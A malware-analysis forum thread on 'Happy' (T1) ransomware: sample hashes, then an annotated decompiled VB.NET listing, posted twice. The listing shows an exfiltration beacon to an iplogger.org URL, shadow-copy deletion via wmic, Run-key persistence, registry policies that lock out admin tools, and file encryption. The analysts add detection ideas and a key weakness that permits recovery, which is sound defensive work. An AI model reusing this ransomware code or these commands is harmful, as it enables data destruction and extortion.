Happy Ransomware (T1)

Forum for analysis and discussion about malware.
joytv

Happy Ransomware (T1)

Post by joytv » Tue Jan 29, 2019 1:41 pm

T1 Happy Ransomware
Sample 1:
MD5: 29cdb46d2e01f2efb9644c7695a007bb
VT: https://www.virustotal.com/#/file/3ed94…/detection (SHA-256 link was truncated in the original post; look the sample up on VirusTotal by the MD5 above instead)

Sample 2:
MD5: b7afca788487347804156f052c613db5
VT: https://www.virustotal.com/#/file/b7afca788487347804156f052c613db5 (link reconstructed from the MD5 above; the original post truncated it)

hackr8

Re: Happy Ransomware (T1)

Post by hackr8 » Tue Jan 29, 2019 3:04 pm

I personally think this is a rather cheap .NET (VB.NET/C#) ransomware.
Part of the decompiled code is below. Note that the decompiler mangled several statements (the User-Agent header construction and the Process.Start chains come out as nonsense), so treat the listing as a sketch of the original logic, not as compilable source:


' Analyst notes on decompiled VB.NET. The decompiler garbled several statements
' (notably L-shaped "New String(9) {}(0) = ..." chains), so this is a sketch of the
' original, not compilable source.
'
' EndOf: final stage. Drops the ransom note, beacons victim details to a tracking
' URL, sleeps 15 s and terminates the process. Me.i (declared outside this listing)
' is used as the number of encrypted files.
Private Sub EndOf()
    ' Ransom note: embedded resource HIT_BY_RANSOMWARE written to the user's desktop.
    System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    ' The next three calls pass a DIRECTORY path (%userprofile%, %appdata%,
    ' %programdata%) to WriteAllText, which throws on an existing directory, and
    ' nothing here catches it. Either the decompiler dropped a file-name suffix or
    ' this is an author bug — confirm against the binary before relying on it.
    System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    ' Beacon / exfiltration. Victim data is smuggled out in the User-Agent header
    ' of a GET to an iplogger.org tracking link (the URL below is a network IOC).
    ' The garbled lines build a 10-element string array whose pieces are visible:
    '   "Name=" & User.Name & "; OS=" & OSFullName & "; RAM=" & <GiB, rounded to 2 dp>
    '   & "; Time=" & DateTime.Now & "; Encrypted Files=" & Me.i
    ' A proxy/IDS rule on that User-Agent shape, or on the iplogger.org host, is a
    ' cheap detection. No response is parsed; DownloadData is only the trigger.
    Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
    Try
        webclient1.Headers
        "User-Agent"
        New String(9) {}
        New String(9) {}(0) = "Name="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
        webclient1.DownloadData("https://iplogger.org/21zut")
    
    ' Try/Finally with no Catch: a failed beacon (no network, sinkholed DNS) runs
    ' the Finally and then propagates, so the Sleep and EndApp below are skipped.
    Finally
        If (webclient1 Is Not Nothing) Then
            webclient1.Dispose()
        End If
    End Try
    ' Fixed 15 s delay, then the VB runtime helper ends the process.
    System.Threading.Thread.Sleep(15000)
    ProjectData.EndApp()
End Sub
' Regs: inhibit-recovery, persistence and "lock the user out of admin tools" stage.
' The Process lines are decompiler garbage; the recoverable intent is two hidden
' child processes started in sequence:
'   wmic.exe shadowcopy delete      -> destroys Volume Shadow Copies so Previous
'                                      Versions / System Restore cannot undo the encryption
'   cmd.exe /c takeown /f %systemroot%\...  -> takes ownership of the Windows directory;
'                                      the rest of the argument string is garbled
' Both need an elevated token to succeed and nothing here checks the result.
' Command-line logging (Sysmon event 1, 4688) on "wmic.exe shadowcopy delete" and
' "takeown /f <systemroot>" is the obvious detection for this stage.
Private Sub Regs()
    New Process()
    New Process().StartInfo.FileName = "wmic.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
    ' All registry writes sit in ONE Try, so the first exception skips every later
    ' line. OpenSubKey(..., True) returns Nothing for a missing key (-> NullReference
    ' on .SetValue) and the HKLM writes need elevation, so on a non-admin run the
    ' whole block is likely a no-op — including the HKCU entries that would
    ' otherwise have succeeded on their own.
    Try
        ' Persistence: HKLM Run value named "Cortana" (name chosen to blend in)
        ' pointing at the path of this executable.
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
        ' Machine-wide policies: disable Task Manager, Registry Editor and Windows
        ' Script Host, which hinders the victim from inspecting or undoing the changes.
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
        ' Same again per-user, plus DisableCMD (created under HKCU\SOFTWARE\Policies\...\System).
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
    
    ' The exception is only recorded by the VB runtime helper; execution continues.
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
End Sub
' EnCrypt: per-file encryption primitive.
'   key    = SHA-256 of the ASCII bytes of the `key` string (32 bytes -> AES-256)
'   cipher = RijndaelManaged (AES-compatible at the default 128-bit block size),
'            ECB mode, default PKCS7 padding
' The two lines after `Mode` are decompiler garbage (a Byte() has no
' TransformFinalBlock, and CreateEncryptor() is not a Byte()); the recoverable
' intent is CreateEncryptor().TransformFinalBlock(input, 0, input.Length) —
' confirm against the binary.
'
' Weaknesses worth recording for victim recovery:
'  * ECB: no IV, so equal 16-byte plaintext blocks give equal ciphertext blocks.
'  * The `key` string is not random — the caller (EncryptDirectory) builds it from
'    a file counter and the hard-coded suffix "GbVjXehg", so every file key is
'    derivable from its position in the encryption order.
' Returns Nothing on any exception (the error is swallowed), and never disposes
' the RijndaelManaged / SHA256Cng instances.
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
    Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
    Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
    Try
        rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
        rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
        Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
        Return rijndaelmanaged1.CreateEncryptor()
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
    Return Nothing
End Function
' EncryptDirectory: recursively encrypts every file under `path` in place and
' appends ".happy" to its name. There is no extension allow/deny list and each
' file is read fully into memory, so large files are handled at once.
'
' GetFiles(..., AllDirectories) runs OUTSIDE the Try: a single unreadable
' subdirectory throws and aborts the whole tree before any file is touched.
Private Sub EncryptDirectory(ByVal path As String)
    Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
    Dim num1 As Integer = 0
    Do While (num1 < array1.Length()) 
        Dim str1 As String = array1(num1)
        Try
            ' Key string for this file = (Me.i + 1) & "GbVjXehg", i.e. "how many files
            ' were encrypted before this one, plus one" and a constant. The key is
            ' therefore predictable: the n-th encrypted file decrypts with
            ' SHA-256(n & "GbVjXehg"), and n is small enough to try per file.
            ' If EnCrypt returned Nothing (it swallows its own errors), WriteAllBytes
            ' throws before opening the file, so that file is left intact.
            System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
            ' Rename to "<original name>.happy"; RenameFile takes a new name, not a path.
            T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
            ' Counter advances only on success, so Me.i = files actually encrypted
            ' (it is also what EndOf reports as "Encrypted Files=").
            Me.i = (Me.i + 1)
        
        ' Locked files, ACL denials and the Nothing-buffer case are all swallowed;
        ' the file is skipped and the loop moves on.
        Catch exception1 As Exception
        End Try
        num1 = (num1 + 1)
    
    Loop
End Sub

joytv

Re: Happy Ransomware (T1)

Post by joytv » Wed Jan 30, 2019 8:37 pm

hackr8 wrote:
Tue Jan 29, 2019 3:04 pm
I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:


' Analyst notes on decompiled VB.NET. The decompiler garbled several statements
' (notably the "New String(9) {}(0) = ..." chains), so this is a sketch of the
' original, not compilable source.
'
' EndOf: final stage. Drops the ransom note, beacons victim details to a tracking
' URL, sleeps 15 s and terminates the process. Me.i (declared outside this listing)
' is used as the number of encrypted files.
Private Sub EndOf()
    ' Ransom note: embedded resource HIT_BY_RANSOMWARE written to the user's desktop.
    System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    ' The next three calls pass a DIRECTORY path (%userprofile%, %appdata%,
    ' %programdata%) to WriteAllText, which throws on an existing directory, and
    ' nothing here catches it. Either the decompiler dropped a file-name suffix or
    ' this is an author bug — confirm against the binary before relying on it.
    System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    ' Beacon / exfiltration. Victim data is smuggled out in the User-Agent header
    ' of a GET to an iplogger.org tracking link (the URL below is a network IOC).
    ' The garbled lines build a 10-element string array whose pieces are visible:
    '   "Name=" & User.Name & "; OS=" & OSFullName & "; RAM=" & <GiB, rounded to 2 dp>
    '   & "; Time=" & DateTime.Now & "; Encrypted Files=" & Me.i
    ' A proxy/IDS rule on that User-Agent shape, or on the iplogger.org host, is a
    ' cheap detection. No response is parsed; DownloadData is only the trigger.
    Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
    Try
        webclient1.Headers
        "User-Agent"
        New String(9) {}
        New String(9) {}(0) = "Name="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
        webclient1.DownloadData("https://iplogger.org/21zut")
    
    ' Try/Finally with no Catch: a failed beacon (no network, sinkholed DNS) runs
    ' the Finally and then propagates, so the Sleep and EndApp below are skipped.
    Finally
        If (webclient1 Is Not Nothing) Then
            webclient1.Dispose()
        End If
    End Try
    ' Fixed 15 s delay, then the VB runtime helper ends the process.
    System.Threading.Thread.Sleep(15000)
    ProjectData.EndApp()
End Sub
' Regs: inhibit-recovery, persistence and "lock the user out of admin tools" stage.
' The Process lines are decompiler garbage; the recoverable intent is two hidden
' child processes started in sequence:
'   wmic.exe shadowcopy delete      -> destroys Volume Shadow Copies so Previous
'                                      Versions / System Restore cannot undo the encryption
'   cmd.exe /c takeown /f %systemroot%\...  -> takes ownership of the Windows directory;
'                                      the rest of the argument string is garbled
' Both need an elevated token to succeed and nothing here checks the result.
' Command-line logging (Sysmon event 1, 4688) on "wmic.exe shadowcopy delete" and
' "takeown /f <systemroot>" is the obvious detection for this stage.
Private Sub Regs()
    New Process()
    New Process().StartInfo.FileName = "wmic.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
    ' All registry writes sit in ONE Try, so the first exception skips every later
    ' line. OpenSubKey(..., True) returns Nothing for a missing key (-> NullReference
    ' on .SetValue) and the HKLM writes need elevation, so on a non-admin run the
    ' whole block is likely a no-op — including the HKCU entries that would
    ' otherwise have succeeded on their own.
    Try
        ' Persistence: HKLM Run value named "Cortana" (name chosen to blend in)
        ' pointing at the path of this executable.
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
        ' Machine-wide policies: disable Task Manager, Registry Editor and Windows
        ' Script Host, which hinders the victim from inspecting or undoing the changes.
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
        ' Same again per-user, plus DisableCMD (created under HKCU\SOFTWARE\Policies\...\System).
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
    
    ' The exception is only recorded by the VB runtime helper; execution continues.
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
End Sub
' EnCrypt: per-file encryption primitive.
'   key    = SHA-256 of the ASCII bytes of the `key` string (32 bytes -> AES-256)
'   cipher = RijndaelManaged (AES-compatible at the default 128-bit block size),
'            ECB mode, default PKCS7 padding
' The two lines after `Mode` are decompiler garbage (a Byte() has no
' TransformFinalBlock, and CreateEncryptor() is not a Byte()); the recoverable
' intent is CreateEncryptor().TransformFinalBlock(input, 0, input.Length) —
' confirm against the binary.
'
' Weaknesses worth recording for victim recovery:
'  * ECB: no IV, so equal 16-byte plaintext blocks give equal ciphertext blocks.
'  * The `key` string is not random — the caller (EncryptDirectory) builds it from
'    a file counter and the hard-coded suffix "GbVjXehg", so every file key is
'    derivable from its position in the encryption order.
' Returns Nothing on any exception (the error is swallowed), and never disposes
' the RijndaelManaged / SHA256Cng instances.
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
    Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
    Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
    Try
        rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
        rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
        Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
        Return rijndaelmanaged1.CreateEncryptor()
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
    Return Nothing
End Function
' EncryptDirectory: recursively encrypts every file under `path` in place and
' appends ".happy" to its name. There is no extension allow/deny list and each
' file is read fully into memory, so large files are handled at once.
'
' GetFiles(..., AllDirectories) runs OUTSIDE the Try: a single unreadable
' subdirectory throws and aborts the whole tree before any file is touched.
Private Sub EncryptDirectory(ByVal path As String)
    Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
    Dim num1 As Integer = 0
    Do While (num1 < array1.Length()) 
        Dim str1 As String = array1(num1)
        Try
            ' Key string for this file = (Me.i + 1) & "GbVjXehg", i.e. "how many files
            ' were encrypted before this one, plus one" and a constant. The key is
            ' therefore predictable: the n-th encrypted file decrypts with
            ' SHA-256(n & "GbVjXehg"), and n is small enough to try per file.
            ' If EnCrypt returned Nothing (it swallows its own errors), WriteAllBytes
            ' throws before opening the file, so that file is left intact.
            System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
            ' Rename to "<original name>.happy"; RenameFile takes a new name, not a path.
            T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
            ' Counter advances only on success, so Me.i = files actually encrypted
            ' (it is also what EndOf reports as "Encrypted Files=").
            Me.i = (Me.i + 1)
        
        ' Locked files, ACL denials and the Nothing-buffer case are all swallowed;
        ' the file is skipped and the loop moves on.
        Catch exception1 As Exception
        End Try
        num1 = (num1 + 1)
    
    Loop
End Sub
Agreed — a cheap, 100% .NET ransomware. Worth adding for anyone hit by it: the per-file key is SHA-256 of a running file counter plus the hard-coded suffix "GbVjXehg" (see EncryptDirectory/EnCrypt), and the cipher is AES in ECB mode, so the files should be recoverable without paying.
